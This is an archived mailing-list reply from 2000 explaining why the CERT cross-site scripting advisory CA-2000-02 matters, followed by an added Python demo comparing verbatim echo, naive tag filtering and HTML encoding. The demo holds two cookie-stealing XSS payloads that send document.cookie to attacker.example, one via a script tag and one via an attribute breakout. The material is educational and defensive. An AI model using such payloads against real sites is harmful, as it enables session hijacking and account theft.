mailing list archives
Re: Fwd: CERT Advisory CA-2000-02
From: marcs () ZNEP COM (Marc Slemko)
Date: Thu, 3 Feb 2000 14:29:23 -0700
-----BEGIN PGP SIGNED MESSAGE-----
On Thu, 3 Feb 2000 Shockro () AOL COM wrote:
> I'm curious as to how this could be used in a malicious manner, as opposed to
> just being an annoyance. I mean, god forbid, people should execute arbitrary
> 1001 ways to crash Internet Explorer through infinite loops, but there's
> nothing seriously harmful about this, am I right? Please correct me if I'm
You are completely wrong.
Please go through the full text of the CERT advisory, and the info
in the Apache and (in particular) Microsoft web sites.
This is a problem because it breaks some of the site-specific barriers.
A very simple example is that this could be used to steal someone's cookie,
which may be what is used to authenticate them.
The problem is a very broad one, however, with a huge number of specific
instances, most of which have probably not been discovered. It also
exploit this in certain ways.
old "if user B submits something to a site that is then shown to
user A, you have to filter or encode it" problem. This is "if user
A submits something to a site that is sent back unfiltered and unencoded
to user A, then you have a security problem". Yes, this is a new
issue. Well, the components of it are (mostly) nothing new, but putting
them together is.
Also note that filtering or encoding things is not as easy as you may
think. There are far too many very annoying things, including character set
issues and browser-specific extensions.
From my brief survey last week, most of the top commerce sites are
vulnerable to some degree (if it can be exploited to any dangerous effect,
however, is another issue) and most webserver products are vulnerable
themselves; Apache's vulnerabilities are among the less serious compared
to a number of other products. Even some products where the vendor has
released a statement saying "no problems" have obvious problems. Don't
start thinking this is just a vendor problem though; the real issue with
this problem is that fixing it requires that a site fix all of its locally
created dynamic content.
Marc Slemko | Apache Software Foundation member
marcs () znep com | marc () apache org
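An added illustration of the point made above about input that is "sent back unfiltered and unencoded" and of the cookie-theft consequence. This is example code written for this archive page; it is not from Marc's message, from the CERT advisory, or from Apache or Microsoft. It sketches a hypothetical search page that echoes its query parameter twice, once in text content and once inside a quoted attribute, and renders it three ways: verbatim, through a naive "strip <script>" filter, and through proper HTML entity encoding. A small parser-based oracle then reports which tags and event-handler attributes in the output came from the input rather than from the template. The page template, the attacker hostname and the payloads are constructed for the example; the character-set and browser-extension problems the message mentions are not covered here.

```python
"""Reflected-input (cross-site scripting) demo: verbatim echo, a naive tag
filter, and HTML entity encoding, compared with a parser-based oracle.
Added example code; the template, hostname and payloads are constructed."""
import re
from html import escape
from html.parser import HTMLParser

# Hypothetical search page. The query is echoed in two different contexts:
# text content inside <p>, and a double-quoted value= attribute on <input>.
TEMPLATE = ('<html><body><p>Results for: {q}</p>'
            '<input type="text" name="q" value="{q}"></body></html>')


def render_unsafe(q: str) -> str:
    """Echo the request parameter back verbatim (the CA-2000-02 bug class)."""
    return TEMPLATE.format(q=q)


def render_filtered(q: str) -> str:
    """A common but inadequate fix: remove <script> tags and echo the rest.
    It does nothing about input that closes the attribute it is placed in."""
    cleaned = re.sub(r'</?script[^>]*>', '', q, flags=re.IGNORECASE)
    return TEMPLATE.format(q=cleaned)


def render_encoded(q: str) -> str:
    """Encode for HTML output: & < > " ' become entities, so the input can
    neither start a tag in text content nor break out of the quoted value=."""
    return TEMPLATE.format(q=escape(q, quote=True))


class _Collector(HTMLParser):
    """Record the tag names and on* event-handler attributes a browser sees."""
    def __init__(self):
        super().__init__()
        self.tags = set()
        self.handlers = set()

    def handle_starttag(self, tag, attrs):
        self.tags.add(tag)
        self.handlers.update(name for name, _ in attrs if name.startswith('on'))


def _scan(page: str) -> _Collector:
    c = _Collector()
    c.feed(page)
    c.close()
    return c


# What the template alone produces, i.e. everything the site intended.
_BASELINE = _scan(TEMPLATE.format(q=''))


def injected_tags(page: str) -> set:
    """Tag names in the rendered page that the template never emits."""
    return _scan(page).tags - _BASELINE.tags


def injected_handlers(page: str) -> set:
    """on* attributes in the rendered page that the template never emits."""
    return _scan(page).handlers - _BASELINE.handlers


# Constructed payloads. The first steals the cookie via a <script> element;
# the second needs no <script> at all: it closes the value="..." attribute
# and adds an <img> whose onerror handler does the same thing.
COOKIE_THIEF = ('<script>new Image().src="http://attacker.example/?c="'
                '+document.cookie</script>')
ATTR_BREAKOUT = ('"><img src=x onerror="new Image().src='
                 "'http://attacker.example/?c='+document.cookie\">")

if __name__ == '__main__':
    for label, render in (('unsafe', render_unsafe),
                          ('filtered', render_filtered),
                          ('encoded', render_encoded)):
        for payload in (COOKIE_THIEF, ATTR_BREAKOUT):
            page = render(payload)
            print(f'{label:8s} tags={sorted(injected_tags(page))} '
                  f'handlers={sorted(injected_handlers(page))}')
```

The filtered variant catches the first payload and misses the second, which is the point about filtering being harder than it looks: the tag you blacklist is not the only way to run script, and the context the input lands in (here, inside an attribute) changes what counts as dangerous. Only the entity-encoded output yields no injected tags or handlers for either payload.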